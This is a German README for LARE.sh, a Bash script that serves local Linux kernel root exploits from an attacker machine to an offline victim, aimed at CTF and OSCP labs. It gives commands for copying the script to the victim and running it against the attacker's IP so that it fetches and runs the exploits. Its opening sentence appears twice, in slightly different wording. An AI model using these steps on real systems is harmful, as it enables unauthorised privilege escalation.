
[L]ocal [A]uto [R]oot [E]xploiter ist ein einfaches Bash-Skript, das Ihnen hilft, lokale Root-Exploits von Ihrem Angriffsrechner aus bereitzustellen, wenn Ihr Zielrechner keine Internetverbindung hat.
[L]okales [A]uto [R]oot [E]xploiter ist ein einfaches Bash-Skript, das dir hilft, lokale Root-Exploits von deinem Angriffsrechner aus bereitzustellen, wenn dein Opferrechner keine Internetverbindung hat.
Das Skript ist nützlich in einem Szenario, in dem dein Opferrechner keine Internetverbindung hat (z.B.) während du in interne Netzwerke pivotierst oder CTFs spielst, die VPN verwenden, um sich mit ihren geschlossenen Labs zu verbinden (z.B. hackthebox.gr) oder sogar in OSCP-Labs. Das Skript verwendet lokale Root-Exploits für Linux-Kernel 2.6-4.8
Dieses Skript ist inspiriert von Nilotpal Biswas' Auto Root Exploit Tool
bash LARE.sh -a or ./LARE.sh -a
Sobald das erledigt ist, musst du das Skript auf den Opferrechner kopieren (mit wget, ftp, curl usw.) und den Exploiter lokal mit dem folgenden Befehl ausführen:
bash LARE.sh -l [Attackers-IP] or ./LARE.sh -l [Attackers-IP]
bash LARE.sh -l or ./LARE.sh -l
Das Skript führt mehrere Kernel-Exploits auf dem Rechner aus, was zu Instabilität des Systems führen kann. Es wird dringend empfohlen, es nur als letztes Mittel und in einer Nicht-Produktionsumgebung zu verwenden.